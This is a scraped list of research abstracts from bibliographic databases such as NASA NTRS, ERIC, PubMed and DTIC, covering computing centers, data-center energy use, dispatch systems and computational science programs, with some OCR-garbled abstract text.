
    2006-07-01

    This document provides the final report for the evaluation of the USDOT-sponsored Computer-Aided Dispatch Traffic Management Center Integration Field Operations Test in the State of Utah. The document discusses evaluation findings in the followin...

  14. Aviation Mechanic General, Airframe, and Powerplant Knowledge Test Guide

    DOT National Transportation Integrated Search

    1995-01-01

    The FAA has available hundreds of computer testing centers nationwide. These testing centers offer the full range of airman knowledge tests. Refer to appendix 1 in this guide for a list of computer testing designees. This knowledge test guide was dev...

  15. Computer-aided dispatch--traffic management center field operational test final test plans : state of Utah

    DOT National Transportation Integrated Search

    2004-01-01

    The purpose of this document is to expand upon the evaluation components presented in "Computer-aided dispatch--traffic management center field operational test final evaluation plan : state of Utah". This document defines the objective, approach, an...

  16. 75 FR 70899 - Submission for OMB Review; Comment Request

    Federal Register 2010, 2011, 2012, 2013, 2014

    2010-11-19

    ... submit to the Office of Management and Budget (OMB) for clearance the following proposal for collection... Annual Burden Hours: 2,952. Public Computer Center Reports (Quarterly and Annually) Number of Respondents... specific to Infrastructure and Comprehensive Community Infrastructure, Public Computer Center, and...

  17. PCs: Key to the Future. Business Center Provides Sound Skills and Good Attitudes.

    ERIC Educational Resources Information Center

    Pay, Renee W.

    1991-01-01

    The Advanced Computing/Management Training Program at Jordan Technical Center (Sandy, Utah) simulates an automated office to teach five sets of skills: computer architecture and operating systems, word processing, data processing, communications skills, and management principles. (SK)

  18. The CSM testbed software system: A development environment for structural analysis methods on the NAS CRAY-2

    NASA Technical Reports Server (NTRS)

    Gillian, Ronnie E.; Lotts, Christine G.

    1988-01-01

    The Computational Structural Mechanics (CSM) Activity at Langley Research Center is developing methods for structural analysis on modern computers. To facilitate that research effort, an applications development environment has been constructed to insulate the researcher from the many computer operating systems of a widely distributed computer network. The CSM Testbed development system was ported to the Numerical Aerodynamic Simulator (NAS) Cray-2, at the Ames Research Center, to provide a high end computational capability. This paper describes the implementation experiences, the resulting capability, and the future directions for the Testbed on supercomputers.

  19. How the Theory of Computing Can Help in Space Exploration

    NASA Technical Reports Server (NTRS)

    Kreinovich, Vladik; Longpre, Luc

    1997-01-01

    The opening of the NASA Pan American Center for Environmental and Earth Sciences (PACES) at the University of Texas at El Paso made it possible to organize the student Center for Theoretical Research and its Applications in Computer Science (TRACS). In this abstract, we briefly describe the main NASA-related research directions of the TRACS center, and give an overview of the preliminary results of student research.

  20. Examining the Fundamental Obstructs of Adopting Cloud Computing for 9-1-1 Dispatch Centers in the USA

    ERIC Educational Resources Information Center

    Osman, Abdulaziz

    2016-01-01

    The purpose of this research study was to examine the unknown fears of embracing cloud computing which stretches across measurements like fear of change from leaders and the complexity of the technology in 9-1-1 dispatch centers in USA. The problem that was addressed in the study was that many 9-1-1 dispatch centers in USA are still using old…

  1. Synergies and Distinctions between Computational Disciplines in Biomedical Research: Perspective from the Clinical and Translational Science Award Programs

    PubMed Central

    Bernstam, Elmer V.; Hersh, William R.; Johnson, Stephen B.; Chute, Christopher G.; Nguyen, Hien; Sim, Ida; Nahm, Meredith; Weiner, Mark; Miller, Perry; DiLaura, Robert P.; Overcash, Marc; Lehmann, Harold P.; Eichmann, David; Athey, Brian D.; Scheuermann, Richard H.; Anderson, Nick; Starren, Justin B.; Harris, Paul A.; Smith, Jack W.; Barbour, Ed; Silverstein, Jonathan C.; Krusch, David A.; Nagarajan, Rakesh; Becich, Michael J.

    2010-01-01

    Clinical and translational research increasingly requires computation. Projects may involve multiple computationally-oriented groups including information technology (IT) professionals, computer scientists and biomedical informaticians. However, many biomedical researchers are not aware of the distinctions among these complementary groups, leading to confusion, delays and sub-optimal results. Although written from the perspective of clinical and translational science award (CTSA) programs within academic medical centers, the paper addresses issues that extend beyond clinical and translational research. The authors describe the complementary but distinct roles of operational IT, research IT, computer science and biomedical informatics using a clinical data warehouse as a running example. In general, IT professionals focus on technology. The authors distinguish between two types of IT groups within academic medical centers: central or administrative IT (supporting the administrative computing needs of large organizations) and research IT (supporting the computing needs of researchers). Computer scientists focus on general issues of computation such as designing faster computers or more efficient algorithms, rather than specific applications. In contrast, informaticians are concerned with data, information and knowledge. Biomedical informaticians draw on a variety of tools, including but not limited to computers, to solve information problems in health care and biomedicine. The paper concludes with recommendations regarding administrative structures that can help to maximize the benefit of computation to biomedical research within academic health centers. PMID:19550198

  2. Funding Public Computing Centers: Balancing Broadband Availability and Expected Demand

    ERIC Educational Resources Information Center

    Jayakar, Krishna; Park, Eun-A

    2012-01-01

    The National Broadband Plan (NBP) recently announced by the Federal Communication Commission visualizes a significantly enhanced commitment to public computing centers (PCCs) as an element of the Commission's plans for promoting broadband availability. In parallel, the National Telecommunications and Information Administration (NTIA) has…

  3. Transportation Research and Analysis Computing Center (TRACC) Year 6 Quarter 4 Progress Report

    DOT National Transportation Integrated Search

    2013-03-01

    Argonne National Laboratory initiated a FY2006-FY2009 multi-year program with the US Department of Transportation (USDOT) on October 1, 2006, to establish the Transportation Research and Analysis Computing Center (TRACC). As part of the TRACC project...

  4. Aerodynamic Characterization of a Modern Launch Vehicle

    NASA Technical Reports Server (NTRS)

    Hall, Robert M.; Holland, Scott D.; Blevins, John A.

    2011-01-01

    A modern launch vehicle is by necessity an extremely integrated design. The accurate characterization of its aerodynamic characteristics is essential to determine design loads, to design flight control laws, and to establish performance. The NASA Ares Aerodynamics Panel has been responsible for technical planning, execution, and vetting of the aerodynamic characterization of the Ares I vehicle. An aerodynamics team supporting the Panel consists of wind tunnel engineers, computational engineers, database engineers, and other analysts that address topics such as uncertainty quantification. The team resides at three NASA centers: Langley Research Center, Marshall Space Flight Center, and Ames Research Center. The Panel has developed strategies to synergistically combine both the wind tunnel efforts and the computational efforts with the goal of validating the computations. Selected examples highlight key flow physics and, where possible, the fidelity of the comparisons between wind tunnel results and the computations. Lessons learned summarize what has been gleaned during the project and can be useful for other vehicle development projects.

  5. Computer Program for Steady Transonic Flow over Thin Airfoils by Finite Elements

    DTIC Science & Technology

    1975-10-01

    COMPUTER PROGRAM FOR STEADY JJ TRANSONIC FLOW OVER THIN AIRFOILS BY g FINITE ELEMENTS • *q^^ r ̂ c HUNTSVILLE RESEARCH & ENGINEERING CENTER...jglMMi B Jun’ INC ORGANIMTION NAME ANO ADDRESS Lö^kfteed Missiles & Space Company, Inc. Huntsville Research & Engineering Center,^ Huntsville, Alab...This report was prepared by personnel in the Computational Mechamcs Section of the Lockheed Missiles fc Space Company, Inc.. Huntsville Research

  6. Developing computer training programs for blood bankers.

    PubMed

    Eisenbrey, L

    1992-01-01

    Two surveys were conducted in July 1991 to gather information about computer training currently performed within American Red Cross Blood Services Regions. One survey was completed by computer trainers from software developer-vendors and regional centers. The second survey was directed to the trainees, to determine their perception of the computer training. The surveys identified the major concepts, length of training, evaluations, and methods of instruction used. Strengths and weaknesses of training programs were highlighted by trainee respondents. Using the survey information and other sources, recommendations (including those concerning which computer skills and tasks should be covered) are made that can be used as guidelines for developing comprehensive computer training programs at any blood bank or blood center.

  7. Intercomparison of Operational Ocean Forecasting Systems in the framework of GODAE

    NASA Astrophysics Data System (ADS)

    Hernandez, F.

    2009-04-01

    One of the main benefits of the GODAE 10-year activity is the implementation of ocean forecasting systems in several countries. In 2008, several systems are operated routinely, at global or basin scale. Among them, the BLUElink (Australia), HYCOM (USA), MOVE/MRI.COM (Japan), Mercator (France), FOAM (United Kingdom), TOPAZ (Norway) and C-NOOFS (Canada) systems offered to demonstrate their operational feasibility by performing an intercomparison exercise during a three months period (February to April 2008). The objectives were: a) to show that operational ocean forecasting systems are operated routinely in different countries, and that they can interact; b) to perform in a similar way a scientific validation aimed to assess the quality of the ocean estimates, the performance, and forecasting capabilities of each system; and c) to learn from this intercomparison exercise to increase inter-operability and collaboration in real time. The intercomparison relies on the assessment strategy developed for the EU MERSEA project, where diagnostics over the global ocean have been revisited by the GODAE contributors. This approach, based on metrics, allow for each system: a) to verify if ocean estimates are consistent with the current general knowledge of the dynamics; and b) to evaluate the accuracy of delivered products, compared to space and in-situ observations. Using the same diagnostics also allows one to intercompare the results from each system consistently. Water masses and general circulation description by the different systems are consistent with WOA05 Levitus climatology. The large scale dynamics (tropical, subtropical and subpolar gyres ) are also correctly reproduced. At short scales, benefit of high resolution systems can be evidenced on the turbulent eddy field, in particular when compared to eddy kinetic energy deduced from satellite altimetry of drifter observations. Comparisons to high resolution SST products show some discrepancies on ocean surface representation, either due to model and forcing fields errors, or assimilation scheme efficiency. Comparisons to sea-ice satellite products also evidence discrepancies linked to model, forcing and assimilation strategies of each forecasting system. Key words: Intercomparison, ocean analysis, operational oceanography, system assessment, metrics, validation GODAE Intercomparison Team: L. Bertino (NERSC/Norway), G. Brassington (BMRC/Australia), E. Chassignet (FSU/USA), J. Cummings (NRL/USA), F. Davidson (DFO/Canda), M. Drévillon (CERFACS/France), P. Hacker (IPRC/USA), M. Kamachi (MRI/Japan), J.-M. Lellouche (CERFACS/France), K. A. Lisæter (NERSC/Norway), R. Mahdon (UKMO/UK), M. Martin (UKMO/UK), A. Ratsimandresy (DFO/Canada), and C. Regnier (Mercator Ocean/France)

  8. Environmental System Science Data Infrastructure for a Virtual Ecosystem (ESS-DIVE) - A New U.S. DOE Data Archive

    NASA Astrophysics Data System (ADS)

    Agarwal, D.; Varadharajan, C.; Cholia, S.; Snavely, C.; Hendrix, V.; Gunter, D.; Riley, W. J.; Jones, M.; Budden, A. E.; Vieglais, D.

    2017-12-01

    The ESS-DIVE archive is a new U.S. Department of Energy (DOE) data archive designed to provide long-term stewardship and use of data from observational, experimental, and modeling activities in the earth and environmental sciences. The ESS-DIVE infrastructure is constructed with the long-term vision of enabling broad access to and usage of the DOE sponsored data stored in the archive. It is designed as a scalable framework that incentivizes data providers to contribute well-structured, high-quality data to the archive and that enables the user community to easily build data processing, synthesis, and analysis capabilities using those data. The key innovations in our design include: (1) application of user-experience research methods to understand the needs of users and data contributors; (2) support for early data archiving during project data QA/QC and before public release; (3) focus on implementation of data standards in collaboration with the community; (4) support for community built tools for data search, interpretation, analysis, and visualization tools; (5) data fusion database to support search of the data extracted from packages submitted and data available in partner data systems such as the Earth System Grid Federation (ESGF) and DataONE; and (6) support for archiving of data packages that are not to be released to the public. ESS-DIVE data contributors will be able to archive and version their data and metadata, obtain data DOIs, search for and access ESS data and metadata via web and programmatic portals, and provide data and metadata in standardized forms. The ESS-DIVE archive and catalog will be federated with other existing catalogs, allowing cross-catalog metadata search and data exchange with existing systems, including DataONE's Metacat search. ESS-DIVE is operated by a multidisciplinary team from Berkeley Lab, the National Center for Ecological Analysis and Synthesis (NCEAS), and DataONE. The primarily data copies are hosted at DOE's NERSC supercomputing facility with replicas at DataONE nodes.

  9. Removing the center from computing: biology's new mode of digital knowledge production.

    PubMed

    November, Joseph

    2011-06-01

    This article shows how the USA's National Institutes of Health (NIH) helped to bring about a major shift in the way computers are used to produce knowledge and in the design of computers themselves as a consequence of its early 1960s efforts to introduce information technology to biologists. Starting in 1960 the NIH sought to reform the life sciences by encouraging researchers to make use of digital electronic computers, but despite generous federal support biologists generally did not embrace the new technology. Initially the blame fell on biologists' lack of appropriate (i.e. digital) data for computers to process. However, when the NIH consulted MIT computer architect Wesley Clark about this problem, he argued that the computer's quality as a device that was centralized posed an even greater challenge to potential biologist users than did the computer's need for digital data. Clark convinced the NIH that if the agency hoped to effectively computerize biology, it would need to satisfy biologists' experimental and institutional needs by providing them the means to use a computer without going to a computing center. With NIH support, Clark developed the 1963 Laboratory Instrument Computer (LINC), a small, real-time interactive computer intended to be used inside the laboratory and controlled entirely by its biologist users. Once built, the LINC provided a viable alternative to the 1960s norm of large computers housed in computing centers. As such, the LINC not only became popular among biologists, but also served in later decades as an important precursor of today's computing norm in the sciences and far beyond, the personal computer.

  10. Autonomic Computing for Spacecraft Ground Systems

    NASA Technical Reports Server (NTRS)

    Li, Zhenping; Savkli, Cetin; Jones, Lori

    2007-01-01

    Autonomic computing for spacecraft ground systems increases the system reliability and reduces the cost of spacecraft operations and software maintenance. In this paper, we present an autonomic computing solution for spacecraft ground systems at NASA Goddard Space Flight Center (GSFC), which consists of an open standard for a message oriented architecture referred to as the GMSEC architecture (Goddard Mission Services Evolution Center), and an autonomic computing tool, the Criteria Action Table (CAT). This solution has been used in many upgraded ground systems for NASA 's missions, and provides a framework for developing solutions with higher autonomic maturity.

  11. Computers as learning resources in the health sciences: impact and issues.

    PubMed Central

    Ellis, L B; Hannigan, G G

    1986-01-01

    Starting with two computer terminals in 1972, the Health Sciences Learning Resources Center of the University of Minnesota Bio-Medical Library expanded its instructional facilities to ten terminals and thirty-five microcomputers by 1985. Computer use accounted for 28% of total center circulation. The impact of these resources on health sciences curricula is described and issues related to use, support, and planning are raised and discussed. Judged by their acceptance and educational value, computers are successful health sciences learning resources at the University of Minnesota. PMID:3518843

  12. AHPCRC (Army High Performance Computing Research Center) Bulletin. Volume 1, Issue 2

    DTIC Science & Technology

    2011-01-01

    area and the researchers working on these projects. Also inside: news from the AHPCRC consortium partners at Morgan State University and the NASA ...Computing Research Center is provided by the supercomputing and research facilities at Stanford University and at the NASA Ames Research Center at...atomic and molecular level, he said. He noted that “every general would like to have” a Star Trek -like holodeck, where holographic avatars could

  13. SANs and Large Scale Data Migration at the NASA Center for Computational Sciences

    NASA Technical Reports Server (NTRS)

    Salmon, Ellen M.

    2004-01-01

    Evolution and migration are a way of life for provisioners of high-performance mass storage systems that serve high-end computers used by climate and Earth and space science researchers: the compute engines come and go, but the data remains. At the NASA Center for Computational Sciences (NCCS), disk and tape SANs are deployed to provide high-speed I/O for the compute engines and the hierarchical storage management systems. Along with gigabit Ethernet, they also enable the NCCS's latest significant migration: the transparent transfer of 300 Til3 of legacy HSM data into the new Sun SAM-QFS cluster.

  14. [Computer-aided prescribing: from utopia to reality].

    PubMed

    Suárez-Varela Ubeda, J; Beltrán Calvo, C; Molina López, T; Navarro Marín, P

    2005-05-31

    To determine whether the introduction of computer-aided prescribing helped reduce the administrative burden at primary care centers. Descriptive, cross-sectional design. Torreblanca Health Center in the province of Seville, southern Spain. From 29 October 2003 to the present a pilot project involving nine pharmacies in the basic health zone served by this health center has been running to evaluate computer-aided prescribing (the Receta XXI project) with real patients. All patients on the center's list of patients who came to the center for an administrative consultation to renew prescriptions for medications or supplies for long-term treatment. Total number of administrative visits per patient for patients who came to the center to renew prescriptions for long-term treatment, as recorded by the Diraya system (Historia Clinica Digital del Ciudadano, or Citizen's Digital Medical Record) during the period from February to July 2004. Total number of the same type of administrative visits recorded by the previous system (TASS) during the period from February to July 2003. The mean number of administrative visits per month during the period from February to July 2003 was 160, compared to a mean number of 64 visits during the period from February to July 2004. The reduction in the number of visits for prescription renewal was 60%. Introducing a system for computer-aided prescribing significantly reduced the number of administrative visits for prescription renewal for long-term treatment. This could help reduce the administrative burden considerably in primary care if the system were used in all centers.

  15. Computer systems and software engineering

    NASA Technical Reports Server (NTRS)

    Mckay, Charles W.

    1988-01-01

    The High Technologies Laboratory (HTL) was established in the fall of 1982 at the University of Houston Clear Lake. Research conducted at the High Tech Lab is focused upon computer systems and software engineering. There is a strong emphasis on the interrelationship of these areas of technology and the United States' space program. In Jan. of 1987, NASA Headquarters announced the formation of its first research center dedicated to software engineering. Operated by the High Tech Lab, the Software Engineering Research Center (SERC) was formed at the University of Houston Clear Lake. The High Tech Lab/Software Engineering Research Center promotes cooperative research among government, industry, and academia to advance the edge-of-knowledge and the state-of-the-practice in key topics of computer systems and software engineering which are critical to NASA. The center also recommends appropriate actions, guidelines, standards, and policies to NASA in matters pertinent to the center's research. Results of the research conducted at the High Tech Lab/Software Engineering Research Center have given direction to many decisions made by NASA concerning the Space Station Program.

  16. Use of PL/1 in a Bibliographic Information Retrieval System.

    ERIC Educational Resources Information Center

    Schipma, Peter B.; And Others

    The Information Sciences section of ITT Research Institute (IITRI) has developed a Computer Search Center and is currently conducting a research project to explore computer searching of a variety of machine-readable data bases. The Center provides Selective Dissemination of Information services to academic, industrial and research organizations…

  17. Command History for 1990

    DTIC Science & Technology

    1991-05-01

    Marine Corps Tiaining Systems (CBESS) memorization training Inteligence Center, Dam Neck Threat memorization training Commander Tactical Wings, Atlantic...News Shipbuilding Technical training AEGIS Training Center, Dare Artificial Intelligence (Al) Tools Computerized firm-end analysis tools NETSCPAC...Technology Department and provides computational and electronic mail support for research in areas of artificial intelligence, computer-assisted instruction

  18. Postdoctoral Fellow | Center for Cancer Research

    Cancer.gov

    The Neuro-Oncology Branch (NOB), Center for Cancer Research (CCR), National Cancer Institute (NCI) of the National Institutes of Health (NIH) is seeking outstanding postdoctoral candidates interested in studying metabolic and cell signaling pathways in the context of brain cancers through construction of computational models amenable to formal computational analysis and

  19. Venus - Computer Simulated Global View Centered at 0 Degrees East Longitude

    NASA Image and Video Library

    1996-03-14

    This global view of the surface of Venus is centered at 0 degrees east longitude. NASA Magellan synthetic aperture radar mosaics from the first cycle of Magellan mapping were mapped onto a computer-simulated globe to create this image. http://photojournal.jpl.nasa.gov/catalog/PIA00257

  20. Computer-Aided Corrosion Program Management

    NASA Technical Reports Server (NTRS)

    MacDowell, Louis

    2010-01-01

    This viewgraph presentation reviews Computer-Aided Corrosion Program Management at John F. Kennedy Space Center. The contents include: 1) Corrosion at the Kennedy Space Center (KSC); 2) Requirements and Objectives; 3) Program Description, Background and History; 4) Approach and Implementation; 5) Challenges; 6) Lessons Learned; 7) Successes and Benefits; and 8) Summary and Conclusions.

  1. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Shankar, Arjun

    Computer scientist Arjun Shankar is director of the Compute and Data Environment for Science (CADES), ORNL’s multidisciplinary big data computing center. CADES offers computing, networking and data analytics to facilitate workflows for both ORNL and external research projects.

  2. Research on Using the Naturally Cold Air and the Snow for Data Center Air-conditioning, and Humidity Control

    NASA Astrophysics Data System (ADS)

    Tsuda, Kunikazu; Tano, Shunichi; Ichino, Junko

    To lower power consumption has becomes a worldwide concern. It is also becoming a bigger area in Computer Systems, such as reflected by the growing use of software-as-a-service and cloud computing whose market has increased since 2000, at the same time, the number of data centers that accumulates and manages the computer has increased rapidly. Power consumption at data centers is accounts for a big share of the entire IT power usage, and is still rapidly increasing. This research focuses on the air-conditioning that occupies accounts for the biggest portion of electric power consumption by data centers, and proposes to develop a technique to lower the power consumption by applying the natural cool air and the snow for control temperature and humidity. We verify those effectiveness of this approach by the experiment. Furthermore, we also examine the extent to which energy reduction is possible when a data center is located in Hokkaido.

  3. Investigating the Mechanism of Action and the Identification of Breast Carcinogens by Computational Analysis of Female Rodent Carcinogens

    DTIC Science & Technology

    2006-08-01

    preparing a COBRE Molecular Targets Project with a goal to extend the computational work of Specific Aims of this project to the discovery of novel...million Center of Biomedical Research Excellence ( COBRE ) grant from the National Center for Research Resources at the National Institutes of Health...three year COBRE -funded project in Molecular Targets. My recruitment to the University of Louisville’s Brown Cancer Center and my proposed COBRE

  4. DoDs Efforts to Consolidate Data Centers Need Improvement

    DTIC Science & Technology

    2016-03-29

    Consolidation Initiative, February 26, 2010. 3 Green IT minimizes negative environmental impact of IT operations by ensuring that computers and computer-related...objectives for consolidating data centers. DoD’s objectives were to: • reduce cost; • reduce environmental impact ; • improve efficiency and service levels...number of DoD data centers. Finding A DODIG-2016-068 │ 7 information in DCIM, the DoD CIO did not confirm whether those changes would impact DoD’s

  5. Bridging the digital divide by increasing computer and cancer literacy: community technology centers for head-start parents and families.

    PubMed

    Salovey, Peter; Williams-Piehota, Pamela; Mowad, Linda; Moret, Marta Elisa; Edlund, Denielle; Andersen, Judith

    2009-01-01

    This article describes the establishment of two community technology centers affiliated with Head Start early childhood education programs focused especially on Latino and African American parents of children enrolled in Head Start. A 6-hour course concerned with computer and cancer literacy was presented to 120 parents and other community residents who earned a free, refurbished, Internet-ready computer after completing the program. Focus groups provided the basis for designing the structure and content of the course and modifying it during the project period. An outcomes-based assessment comparing program participants with 70 nonparticipants at baseline, immediately after the course ended, and 3 months later suggested that the program increased knowledge about computers and their use, knowledge about cancer and its prevention, and computer use including health information-seeking via the Internet. The creation of community computer technology centers requires the availability of secure space, capacity of a community partner to oversee project implementation, and resources of this partner to ensure sustainability beyond core funding.

  6. The Center for Computational Biology: resources, achievements, and challenges

    PubMed Central

    Dinov, Ivo D; Thompson, Paul M; Woods, Roger P; Van Horn, John D; Shattuck, David W; Parker, D Stott

    2011-01-01

    The Center for Computational Biology (CCB) is a multidisciplinary program where biomedical scientists, engineers, and clinicians work jointly to combine modern mathematical and computational techniques, to perform phenotypic and genotypic studies of biological structure, function, and physiology in health and disease. CCB has developed a computational framework built around the Manifold Atlas, an integrated biomedical computing environment that enables statistical inference on biological manifolds. These manifolds model biological structures, features, shapes, and flows, and support sophisticated morphometric and statistical analyses. The Manifold Atlas includes tools, workflows, and services for multimodal population-based modeling and analysis of biological manifolds. The broad spectrum of biomedical topics explored by CCB investigators include the study of normal and pathological brain development, maturation and aging, discovery of associations between neuroimaging and genetic biomarkers, and the modeling, analysis, and visualization of biological shape, form, and size. CCB supports a wide range of short-term and long-term collaborations with outside investigators, which drive the center's computational developments and focus the validation and dissemination of CCB resources to new areas and scientific domains. PMID:22081221

  7. The Center for Computational Biology: resources, achievements, and challenges.

    PubMed

    Toga, Arthur W; Dinov, Ivo D; Thompson, Paul M; Woods, Roger P; Van Horn, John D; Shattuck, David W; Parker, D Stott

    2012-01-01

    The Center for Computational Biology (CCB) is a multidisciplinary program where biomedical scientists, engineers, and clinicians work jointly to combine modern mathematical and computational techniques, to perform phenotypic and genotypic studies of biological structure, function, and physiology in health and disease. CCB has developed a computational framework built around the Manifold Atlas, an integrated biomedical computing environment that enables statistical inference on biological manifolds. These manifolds model biological structures, features, shapes, and flows, and support sophisticated morphometric and statistical analyses. The Manifold Atlas includes tools, workflows, and services for multimodal population-based modeling and analysis of biological manifolds. The broad spectrum of biomedical topics explored by CCB investigators include the study of normal and pathological brain development, maturation and aging, discovery of associations between neuroimaging and genetic biomarkers, and the modeling, analysis, and visualization of biological shape, form, and size. CCB supports a wide range of short-term and long-term collaborations with outside investigators, which drive the center's computational developments and focus the validation and dissemination of CCB resources to new areas and scientific domains.

  8. Decomposition of algebraic sets and applications to weak centers of cubic systems

    NASA Astrophysics Data System (ADS)

    Chen, Xingwu; Zhang, Weinian

    2009-10-01

    There are many methods such as Gröbner basis, characteristic set and resultant, in computing an algebraic set of a system of multivariate polynomials. The common difficulties come from the complexity of computation, singularity of the corresponding matrices and some unnecessary factors in successive computation. In this paper, we decompose algebraic sets, stratum by stratum, into a union of constructible sets with Sylvester resultants, so as to simplify the procedure of elimination. Applying this decomposition to systems of multivariate polynomials resulted from period constants of reversible cubic differential systems which possess a quadratic isochronous center, we determine the order of weak centers and discuss the bifurcation of critical periods.

  9. Development of Advanced Computational Aeroelasticity Tools at NASA Langley Research Center

    NASA Technical Reports Server (NTRS)

    Bartels, R. E.

    2008-01-01

    NASA Langley Research Center has continued to develop its long standing computational tools to address new challenges in aircraft and launch vehicle design. This paper discusses the application and development of those computational aeroelastic tools. Four topic areas will be discussed: 1) Modeling structural and flow field nonlinearities; 2) Integrated and modular approaches to nonlinear multidisciplinary analysis; 3) Simulating flight dynamics of flexible vehicles; and 4) Applications that support both aeronautics and space exploration.

  10. Computational Fluid Dynamics. [numerical methods and algorithm development

    NASA Technical Reports Server (NTRS)

    1992-01-01

    This collection of papers was presented at the Computational Fluid Dynamics (CFD) Conference held at Ames Research Center in California on March 12 through 14, 1991. It is an overview of CFD activities at NASA Lewis Research Center. The main thrust of computational work at Lewis is aimed at propulsion systems. Specific issues related to propulsion CFD and associated modeling will also be presented. Examples of results obtained with the most recent algorithm development will also be presented.

  11. Expanding HPC and Research Computing--The Sustainable Way

    ERIC Educational Resources Information Center

    Grush, Mary

    2009-01-01

    Increased demands for research and high-performance computing (HPC)--along with growing expectations for cost and environmental savings--are putting new strains on the campus data center. More and more, CIOs like the University of Notre Dame's (Indiana) Gordon Wishon are seeking creative ways to build more sustainable models for data center and…

  12. School Data Processing Services in Texas. A Cooperative Approach. [Revised.

    ERIC Educational Resources Information Center

    Texas Education Agency, Austin. Management Information Center.

    The Texas plan for computer services provides services to public school districts through a statewide network of 20 regional Education Service Centers (ESC). Each of the three Multi-Regional Processing Centers (MRPCs) operates a large computer facility providing school district services within from three to eight ESC regions; each of the five…

  13. School Data Processing Services in Texas: A Cooperative Approach.

    ERIC Educational Resources Information Center

    Texas Education Agency, Austin.

    The Texas plan for computer services provides services to public school districts through a statewide network of 20 regional Education Service Centers (ESC). Each of the three Multi-Regional Processing Centers (MRPCs) operates a large computer facility providing school district services within from three to eight ESC regions; each of the five…

  14. School Data Processing Services in Texas: A Cooperative Approach.

    ERIC Educational Resources Information Center

    Texas Education Agency, Austin.

    The Texas plan for computer services provides services to public school districts through a statewide network of 20 regional Education Service Centers (ESO). Each of the three Multi-Regional Processing Centers (MRPCs) operates a large computer facility providing school district services within from three to eight ESC regions each of the five…

  15. Remote Science Operation Center research

    NASA Technical Reports Server (NTRS)

    Banks, P. M.

    1986-01-01

    Progress in the following areas is discussed: the design, planning and operation of a remote science payload operations control center; design and planning of a data link via satellite; and the design and prototyping of an advanced workstation environment for multi-media (3-D computer aided design/computer aided engineering, voice, video, text) communications and operations.

  16. SAM: The "Search and Match" Computer Program of the Escherichia coli Genetic Stock Center

    ERIC Educational Resources Information Center

    Bachmann, B. J.; And Others

    1973-01-01

    Describes a computer program used at a genetic stock center to locate particular strains of bacteria. The program can match up to 30 strain descriptions requested by a researcher with the records on file. Uses of this particular program can be made in many fields. (PS)

  17. Hibbing Community College's Community Computer Center.

    ERIC Educational Resources Information Center

    Regional Technology Strategies, Inc., Carrboro, NC.

    This paper reports on the development of the Community Computer Center (CCC) at Hibbing Community College (HCC) in Minnesota. HCC is located in the largest U.S. iron mining area in the United States. Closures of steel-producing plants are affecting the Hibbing area. Outmigration, particularly of younger workers and their families, has been…

  18. 48 CFR 9905.506-60 - Illustrations.

    Code of Federal Regulations, 2013 CFR

    2013-10-01

    ..., installs a computer service center to begin operations on May 1. The operating expense related to the new... operating expenses of the computer service center for the 8-month part of the cost accounting period may be... 48 Federal Acquisition Regulations System 7 2013-10-01 2012-10-01 true Illustrations. 9905.506-60...

  19. The Mathematics and Computer Science Learning Center (MLC).

    ERIC Educational Resources Information Center

    Abraham, Solomon T.

    The Mathematics and Computer Science Learning Center (MLC) was established in the Department of Mathematics at North Carolina Central University during the fall semester of the 1982-83 academic year. The initial operations of the MLC were supported by grants to the University from the Burroughs-Wellcome Company and the Kenan Charitable Trust Fund.…

  20. Film Library Information Management System.

    ERIC Educational Resources Information Center

    Minnella, C. Vincent; And Others

    The computer program described not only allows the user to determine rental sources for a particular film title quickly, but also to select the least expensive of the sources. This program developed at SUNY Cortland's Sperry Learning Resources Center and Computer Center is designed to maintain accurate data on rental and purchase films in both…

  1. Microgravity

    NASA Image and Video Library

    1999-05-26

    Looking for a faster computer? How about an optical computer that processes data streams simultaneously and works with the speed of light? In space, NASA researchers have formed optical thin-film. By turning these thin-films into very fast optical computer components, scientists could improve computer tasks, such as pattern recognition. Dr. Hossin Abdeldayem, physicist at NASA/Marshall Space Flight Center (MSFC) in Huntsville, Al, is working with lasers as part of an optical system for pattern recognition. These systems can be used for automated fingerprinting, photographic scarning and the development of sophisticated artificial intelligence systems that can learn and evolve. Photo credit: NASA/Marshall Space Flight Center (MSFC)

  2. Knowledge management: Role of the the Radiation Safety Information Computational Center (RSICC)

    NASA Astrophysics Data System (ADS)

    Valentine, Timothy

    2017-09-01

    The Radiation Safety Information Computational Center (RSICC) at Oak Ridge National Laboratory (ORNL) is an information analysis center that collects, archives, evaluates, synthesizes and distributes information, data and codes that are used in various nuclear technology applications. RSICC retains more than 2,000 software packages that have been provided by code developers from various federal and international agencies. RSICC's customers (scientists, engineers, and students from around the world) obtain access to such computing codes (source and/or executable versions) and processed nuclear data files to promote on-going research, to ensure nuclear and radiological safety, and to advance nuclear technology. The role of such information analysis centers is critical for supporting and sustaining nuclear education and training programs both domestically and internationally, as the majority of RSICC's customers are students attending U.S. universities. Additionally, RSICC operates a secure CLOUD computing system to provide access to sensitive export-controlled modeling and simulation (M&S) tools that support both domestic and international activities. This presentation will provide a general review of RSICC's activities, services, and systems that support knowledge management and education and training in the nuclear field.

  3. Computer Learning for Young Children.

    ERIC Educational Resources Information Center

    Choy, Anita Y.

    1995-01-01

    Computer activities that combine education and entertainment make learning easy and fun for preschoolers. Computers encourage social skills, language and literacy skills, cognitive development, problem solving, and eye-hand coordination. The paper describes one teacher's experiences setting up a computer center and using computers with…

  4. Computer Literacy Project. A General Orientation in Basic Computer Concepts and Applications.

    ERIC Educational Resources Information Center

    Murray, David R.

    This paper proposes a two-part, basic computer literacy program for university faculty, staff, and students with no prior exposure to computers. The program described would introduce basic computer concepts and computing center service programs and resources; provide fundamental preparation for other computer courses; and orient faculty towards…

  5. Physics of the 1 Teraflop RIKEN-BNL-Columbia QCD project. Proceedings of RIKEN BNL Research Center workshop: Volume 13

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    NONE

    1998-10-16

    A workshop was held at the RIKEN-BNL Research Center on October 16, 1998, as part of the first anniversary celebration for the center. This meeting brought together the physicists from RIKEN-BNL, BNL and Columbia who are using the QCDSP (Quantum Chromodynamics on Digital Signal Processors) computer at the RIKEN-BNL Research Center for studies of QCD. Many of the talks in the workshop were devoted to domain wall fermions, a discretization of the continuum description of fermions which preserves the global symmetries of the continuum, even at finite lattice spacing. This formulation has been the subject of analytic investigation for somemore » time and has reached the stage where large-scale simulations in QCD seem very promising. With the computational power available from the QCDSP computers, scientists are looking forward to an exciting time for numerical simulations of QCD.« less

  6. Computational Science News | Computational Science | NREL

    Science.gov Websites

